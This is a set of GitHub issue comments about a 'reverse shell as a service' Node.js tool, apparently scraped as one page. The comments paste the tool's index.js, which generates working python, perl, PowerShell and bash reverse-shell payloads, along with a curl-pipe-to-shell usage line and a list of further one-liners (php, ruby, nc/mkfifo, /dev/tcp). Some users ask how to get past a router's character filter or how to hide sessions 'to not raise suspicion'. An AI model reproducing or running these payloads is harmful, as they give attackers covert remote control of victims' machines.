Can you please tell how to host it on localhost

Node version info:

tried running the it on localhost , but receiving an error and tried using with sudo also.

npm install

and

npm start

The index.js that i change the command is like this:
'use strict';

const usage = `# Reverse Shell as a Service

https://github.com/GetRektBoy724/reverse-shell-as-service

List Of Payload:

1. python

2. perl

3. pwrshell

4. bash

How to use:

1. On your machine:

nc -l 1337

2. On the target machine:

curl -s https://shell.now.sh/yourip:1337 | payloadname

3. Don't be a dick`;

const generateScript = (host, port) => {
const payloads = {
python: python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("${host}",${port})); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);',
perl: perl -e 'use Socket;$i="${host}";$p=${port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};',
pwrshell: powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('${host}',${port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()",
bash: /bin/bash -i >& /dev/tcp/${host}/${port} 0>&1,

    };

return Object.entries(payloads).reduce((script, [cmd, payload]) => {
	script += `

if command -v ${cmd} > /dev/null 2>&1; then
${payload}
exit;
fi`;

	return script;
}, '');

};

const reverseShell = req => {
const [host, port] = req.url.substr(1).split(':');
return usage + (host && port && generateScript(host, port));
};

module.exports = reverseShell;

Can i change the command at the index.js,and if i change the command is that wil be work?

So the terminal can be closed without killing the session.

Hi,

Trying to contribute by adding 'self-host feature on persons own webserver'.
Could you please open source your server.js of https://shell.now.sh?

I would like to implement something like this:
"https://mywebsite.com/rs/host:port"

Hello!

I really like your project, it is a lot more useful in pentesting than just a "prank".
So, as real usage of it emerges, new needs emerge too.

There are multiple ways to spawn a reverse shell. There are cases that python isn't installed somewhere, so your oneliner won't run and... no shell.

To dodge this, some years ago (when I was learning bash scripting), I created this project oneliner-sh. This is a CLI tool that lists many oneliners for the tester to try. That includes ruby, perl, pure bash(without netcat), powershell, etc.

I'd be really happy if you included several oneliners in your shell as a service, and (while defaulting to python) made possible an argument - let's say ?type=ruby - that would pick and return the modified version of the corresponding oneliner.

You will find many oneliner templates in the templates/ folder of my project.

Your project rocks!

P.S. Including a platform=(windows|linux) parameter will probably be needed, for better fitting the oneliners into the real situation.

Sample output of the tool:

Inline Reverse Shells
Provides Greppable-Cuttable one liners with one keystroke!
version: 0.1 alpha

0#shell#perl#perl -MIO::Socket -e '$c=new IO::Socket::INET(PeerAddr => "192.168.1.10:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'#
1#shell#php#<?php $sock=fsockopen("192.168.1.10",4444);exec("/bin/sh <&3 >&3 2>&3"); ?>#
2#shell#python#python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.10",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call("/bin/sh",shell=True);'#
3#shell#ruby#ruby -rsocket -e 'c=TCPSocket.new("192.168.1.10","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'#
4#shell#shell_script#rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh 2>&1|nc 192.168.1.10 4444 >/tmp/f#
5#shell#shell_script#exec 5<>/dev/tcp/192.168.1.10/4444;cat <&5 | while read line; do $line 2>&5 >&5; done#
6#shell#shell_script#/bin/sh -i >& /dev/tcp/192.168.1.10/4444 0>&1#

Hi,

The host https://shell.now.sh is down and is giving a 404, was working fine around a month ago.

POCs:

Hello sir, can u help me, how can i use this in HACK THE BOX machines ?

I am a JavaScript Noob.

Is this work on windows

if I change the command at index.js, whether index.js can still execute commands to the client

Hi, I would appreciate all the help I can get. Ping @lukechilds and @uzil.

Summary: Is there another way of getting a reverse shell without using redirection etc?

Let's say I have this piece of code in my router hindering me from obtaining a reverse shell:

--- Helper function to check that the arguments that are passed to dnsget / ping do not contain special characters that make
-- the call turn into an exploit
-- @param str The string to check
-- @return true if the string does not contain an apparent exploit, false otherwise
local function check_for_exploit(str)
    if str then
        -- try to make sure the string is not an exploit in disguise
        -- it is about to be concatenated to a command so ...
        return match(str,"^[^<>%s%*%(%)%|&;~!?\\$]+$") and not (match(str,"^-") or match(str,"-$"))
    else
        return false
    end
end

This means I cannot use something like:

sh -i >& /dev/tcp/10.1.1.6/4444 0>&1

as the & and the > characters will cause check_for_exploit to return true.

Thanks,

So the terminal window can be closed to not raise suspicion without killing the sessions.

Should work on both macOS and Linux.

I suggest change python to python3 or python2.

Useful for managing multiple connections.

https://github.com/roccomuso/alveare

Nice job @roccomuso!

Version 10 of Node.js (code name Dubnium) has been released! 🎊

To see what happens to your code in Node.js 10, Greenkeeper has created a branch with the following changes:

• Added the new Node.js version to your .travis.yml

If you’re interested in upgrading this repo to Node.js 10, you can open a PR with these changes. Please note that this issue is just intended as a friendly reminder and the PR as a possible starting point for getting your code running on Node.js 10.

Your Greenkeeper Bot 🌴

Anyone can access shell if they hit the correct ip:port .
Why not add a password ??